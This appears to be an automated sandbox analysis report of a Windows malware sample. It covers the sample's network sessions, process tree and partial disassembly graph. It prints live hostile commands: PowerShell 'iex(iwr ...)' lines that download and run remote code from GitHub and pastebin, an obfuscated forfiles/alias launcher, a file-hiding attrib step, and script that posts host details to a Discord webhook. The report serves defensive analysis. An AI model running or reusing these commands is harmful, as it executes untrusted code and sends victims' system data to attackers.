                                                              2024-10-15 14:01:28 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                              2024-10-15 14:01:28 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.949943162.159.137.2324437328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:33 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 296
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:33 UTC296OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 57 43 34 59 41 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41
                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MWC4YAN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FA
                                                              2024-10-15 14:01:34 UTC1255INHTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 14:01:33 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729000895
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ff0O17UB3Ov3KTZmhUISKgZci0UZGNxr8qZ2cdsp%2BKOtY1dKXzn4%2F8MfuzKP4FZAf9cRxS9fA5hleR5PcSqyo83FD6mG%2FNLGtrsuNdDyDiYP6m2NnO7fzKzs2SIV"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=d9dc4083431ce817dfbc35ac79b778c84967b3e6-1729000893; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=T8QA7EP1FFG0VuusfKDGu21WWqvSlHvJJ.YAY7ZCz3k-1729000893944-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d30578259c74761-DFW
                                                              2024-10-15 14:01:34 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.949984162.159.137.2324437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:41 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 296
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:41 UTC296OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 74 69 6e 61 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 57 43 34 59 41 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41
                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** MWC4YAN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FA
                                                              2024-10-15 14:01:42 UTC1259INHTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 14:01:42 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729000903
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1WJRR4H3K2KLLgXbDWi7%2BRVDgprYviDKr3%2BaAafST2985oEVwmhp91vSVx1TAAfQpa8oI7eXDu46chZ%2FmIKZI1DmY%2FkZnf027A7xgT4J0510P%2FMSwyWeaRV1UEpF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=fbd1557a38fcd621c012b0decde5f8af2ef4fff2-1729000902; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=Ezu6upK7b7Q.YbiuCSJWjKSjGNCEhRlEZ00le.X7ekw-1729000902110-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d3057b57f8f475c-DFW
                                                              2024-10-15 14:01:42 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:10:00:55
                                                              Start date:15/10/2024
                                                              Path:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\OSLdZanXNc.exe"
                                                              Imagebase:0x7ff68ef30000
                                                              File size:45'568 bytes
                                                              MD5 hash:98FF253F6F854DF7B7F6794A2761DBD1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:10:00:55
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:10:00:55
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:10:00:58
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:5
                                                              Start time:10:00:58
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:7
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\forfiles.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                              Imagebase:0x7ff7af110000
                                                              File size:52'224 bytes
                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:false

                                                              General

                                                              Target ID:8
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:9
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\attrib.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                              Imagebase:0x7ff780d50000
                                                              File size:23'040 bytes
                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:11
                                                              Start time:10:01:16
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:12
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\forfiles.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                              Imagebase:0x7ff7af110000
                                                              File size:52'224 bytes
                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:13
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff70f010000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:14
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:15
                                                              Start time:10:01:24
                                                              Start date:15/10/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                              Imagebase:0x7ff760310000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:4.7%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:46.3%
                                                                Total number of Nodes:242
                                                                Total number of Limit Nodes:4
                                                                execution_graph 1981 7ff68ef39396 _seh_filter_exe 1932 7ff68ef37e80 1933 7ff68ef37e9d 1932->1933 1936 7ff68ef37ec6 1932->1936 1934 7ff68ef37eb9 1933->1934 1942 7ff68ef38a30 1933->1942 1937 7ff68ef37fcf 1936->1937 1940 7ff68ef37f80 1936->1940 1938 7ff68ef37fc8 1937->1938 1939 7ff68ef38a30 memmove 1937->1939 1939->1938 1940->1938 1941 7ff68ef38a30 memmove 1940->1941 1941->1938 1943 7ff68ef38a41 1942->1943 1944 7ff68ef38af8 1943->1944 1945 7ff68ef38ad2 memmove 1943->1945 1944->1934 1945->1944 1946 7ff68ef31e80 1949 7ff68ef32250 1946->1949 1950 7ff68ef31e89 1949->1950 1951 7ff68ef32273 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 1949->1951 1951->1950 1982 7ff68ef38120 1983 7ff68ef3813e 1982->1983 1986 7ff68ef3816d 1982->1986 1984 7ff68ef3815a 1983->1984 1985 7ff68ef38a30 memmove 1983->1985 1985->1984 1988 7ff68ef38302 1986->1988 1990 7ff68ef382b6 1986->1990 1987 7ff68ef382fe 1988->1987 1989 7ff68ef38a30 memmove 1988->1989 1989->1987 1990->1987 1991 7ff68ef38a30 memmove 1990->1991 1991->1987 1992 7ff68ef31c20 1993 7ff68ef31c30 1992->1993 2005 7ff68ef32088 1993->2005 1995 7ff68ef32370 9 API calls 1996 7ff68ef31cd5 1995->1996 1997 7ff68ef31c54 _RTC_Initialize 2002 7ff68ef31cb7 1997->2002 2013 7ff68ef32310 InitializeSListHead 1997->2013 2002->1995 2004 7ff68ef31cc5 2002->2004 2006 7ff68ef32099 2005->2006 2007 7ff68ef320cb 2005->2007 2008 7ff68ef32108 2006->2008 2011 7ff68ef3209e __scrt_acquire_startup_lock 2006->2011 2007->1997 2009 7ff68ef32370 9 API calls 2008->2009 2010 7ff68ef32112 2009->2010 2011->2007 2012 7ff68ef320bb _initialize_onexit_table 2011->2012 2012->2007 1735 7ff68ef31d04 1736 7ff68ef31d1d 1735->1736 1737 7ff68ef31e5b 1736->1737 1738 7ff68ef31d25 __scrt_acquire_startup_lock 1736->1738 1843 7ff68ef32370 IsProcessorFeaturePresent 1737->1843 1740 7ff68ef31e65 1738->1740 1741 7ff68ef31d43 __scrt_release_startup_lock 1738->1741 1742 7ff68ef32370 9 API calls 1740->1742 1744 7ff68ef31d68 1741->1744 1746 7ff68ef31dee _get_initial_narrow_environment __p___argv __p___argc 1741->1746 1750 7ff68ef31de6 _register_thread_local_exe_atexit_callback 1741->1750 1743 7ff68ef31e70 1742->1743 1745 7ff68ef31e78 _exit 1743->1745 1755 7ff68ef31530 1746->1755 1750->1746 1752 7ff68ef31e1b 1753 7ff68ef31e20 _cexit 1752->1753 1754 7ff68ef31e25 1752->1754 1753->1754 1754->1744 1756 7ff68ef31590 1755->1756 1756->1756 1757 7ff68ef31619 malloc 1756->1757 1758 7ff68ef31640 1757->1758 1758->1758 1759 7ff68ef316e0 WinExec free strrchr 1758->1759 1760 7ff68ef31707 1759->1760 1761 7ff68ef31714 1760->1761 1769 7ff68ef3173b 1760->1769 1849 7ff68ef313f0 __acrt_iob_func 1761->1849 1763 7ff68ef31723 1764 7ff68ef313f0 printf 2 API calls 1763->1764 1766 7ff68ef3172f 1764->1766 1765 7ff68ef313f0 printf 2 API calls 1773 7ff68ef31763 1765->1773 1772 7ff68ef313f0 printf 2 API calls 1766->1772 1767 7ff68ef313f0 printf 2 API calls 1768 7ff68ef317b7 CreateFileA 1767->1768 1770 7ff68ef3180c GetFileSize malloc 1768->1770 1771 7ff68ef317eb GetLastError 1768->1771 1769->1765 1769->1773 1776 7ff68ef39247 1770->1776 1774 7ff68ef313f0 printf 2 API calls 1771->1774 1775 7ff68ef31807 1772->1775 1773->1767 1774->1775 1897 7ff68ef31c00 1775->1897 1777 7ff68ef31831 ReadFile 1776->1777 1779 7ff68ef31852 GetLastError 1777->1779 1780 7ff68ef31873 CloseHandle 1777->1780 1783 7ff68ef313f0 printf 2 API calls 1779->1783 1780->1775 1781 7ff68ef31889 1780->1781 1781->1775 1852 7ff68ef314b0 1781->1852 1783->1775 1785 7ff68ef31899 1785->1775 1786 7ff68ef314b0 2 API calls 1785->1786 1787 7ff68ef318aa 1786->1787 1787->1766 1787->1775 1788 7ff68ef313f0 printf 2 API calls 1787->1788 1789 7ff68ef318c8 1788->1789 1790 7ff68ef31948 1789->1790 1791 7ff68ef318cd 1789->1791 1792 7ff68ef31a0e 1790->1792 1793 7ff68ef31951 1790->1793 1794 7ff68ef313f0 printf 2 API calls 1791->1794 1795 7ff68ef313f0 printf 2 API calls 1792->1795 1796 7ff68ef31956 1793->1796 1797 7ff68ef319b2 1793->1797 1798 7ff68ef318d9 1794->1798 1800 7ff68ef31a2b CreateFileA 1795->1800 1801 7ff68ef313f0 printf 2 API calls 1796->1801 1802 7ff68ef313f0 printf 2 API calls 1797->1802 1864 7ff68ef31450 1798->1864 1800->1775 1804 7ff68ef31a66 1800->1804 1805 7ff68ef31962 1801->1805 1806 7ff68ef319be 1802->1806 1803 7ff68ef31906 CopyFileA 1803->1792 1811 7ff68ef31925 GetLastError 1803->1811 1809 7ff68ef313f0 printf 2 API calls 1804->1809 1810 7ff68ef31450 __stdio_common_vsprintf 1805->1810 1807 7ff68ef31450 __stdio_common_vsprintf 1806->1807 1807->1792 1812 7ff68ef31a72 1809->1812 1810->1803 1813 7ff68ef313f0 printf 2 API calls 1811->1813 1814 7ff68ef313f0 printf 2 API calls 1812->1814 1815 7ff68ef31941 1813->1815 1816 7ff68ef31a7e 1814->1816 1815->1775 1867 7ff68ef32960 malloc memset 1816->1867 1818 7ff68ef31b16 1875 7ff68ef32a10 1818->1875 1819 7ff68ef31a86 1819->1818 1869 7ff68ef32a60 1819->1869 1823 7ff68ef31b20 1826 7ff68ef313f0 printf 2 API calls 1823->1826 1824 7ff68ef31b06 1824->1818 1827 7ff68ef31b10 free 1824->1827 1825 7ff68ef31b32 1828 7ff68ef32a10 free 1825->1828 1826->1815 1827->1818 1829 7ff68ef31b3c 1828->1829 1830 7ff68ef313f0 printf 2 API calls 1829->1830 1831 7ff68ef31b4d 1830->1831 1832 7ff68ef313f0 printf 2 API calls 1831->1832 1833 7ff68ef31b65 1832->1833 1834 7ff68ef313f0 printf 2 API calls 1833->1834 1835 7ff68ef31b74 1834->1835 1879 7ff68ef310e0 1835->1879 1838 7ff68ef31b87 1838->1766 1839 7ff68ef31b90 1840 7ff68ef313f0 printf 2 API calls 1839->1840 1840->1815 1841 7ff68ef324c0 GetModuleHandleW 1842 7ff68ef31e17 1841->1842 1842->1743 1842->1752 1844 7ff68ef32396 1843->1844 1845 7ff68ef323a4 memset RtlCaptureContext RtlLookupFunctionEntry 1844->1845 1846 7ff68ef3241a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 1845->1846 1847 7ff68ef323de RtlVirtualUnwind 1845->1847 1848 7ff68ef3249a 1846->1848 1847->1846 1848->1740 1906 7ff68ef313e0 1849->1906 1851 7ff68ef31426 __stdio_common_vfprintf 1851->1763 1853 7ff68ef314c6 1852->1853 1858 7ff68ef314dc 1852->1858 1854 7ff68ef313f0 printf 2 API calls 1853->1854 1857 7ff68ef314d2 1854->1857 1855 7ff68ef31519 1856 7ff68ef313f0 printf 2 API calls 1855->1856 1861 7ff68ef31525 1856->1861 1857->1785 1858->1855 1859 7ff68ef314ef 1858->1859 1860 7ff68ef31503 1858->1860 1859->1785 1862 7ff68ef313f0 printf 2 API calls 1860->1862 1861->1785 1863 7ff68ef3150f 1862->1863 1863->1785 1907 7ff68ef313e0 1864->1907 1866 7ff68ef31476 __stdio_common_vsprintf 1866->1803 1868 7ff68ef3298c 1867->1868 1868->1819 1870 7ff68ef32a95 1869->1870 1874 7ff68ef31b00 1870->1874 1908 7ff68ef36ce0 1870->1908 1872 7ff68ef32b1a 1872->1874 1912 7ff68ef36ed0 1872->1912 1874->1824 1874->1825 1876 7ff68ef32a51 1875->1876 1878 7ff68ef32a1e 1875->1878 1876->1823 1877 7ff68ef32a3b free 1877->1823 1878->1876 1878->1877 1880 7ff68ef31138 GetFileSize 1879->1880 1881 7ff68ef313ad 1879->1881 1882 7ff68ef3115c CreateFileMappingW MapViewOfFile 1880->1882 1883 7ff68ef313a2 CloseHandle 1880->1883 1884 7ff68ef31c00 8 API calls 1881->1884 1885 7ff68ef311c7 1882->1885 1886 7ff68ef311b3 CloseHandle 1882->1886 1883->1881 1887 7ff68ef313cf 1884->1887 1885->1883 1888 7ff68ef311d0 UnmapViewOfFile 1885->1888 1886->1885 1887->1838 1887->1839 1889 7ff68ef311ef CreateFileMappingW MapViewOfFile 1888->1889 1890 7ff68ef311e2 CloseHandle 1888->1890 1891 7ff68ef31250 CloseHandle 1889->1891 1892 7ff68ef31264 1889->1892 1890->1889 1891->1892 1892->1883 1893 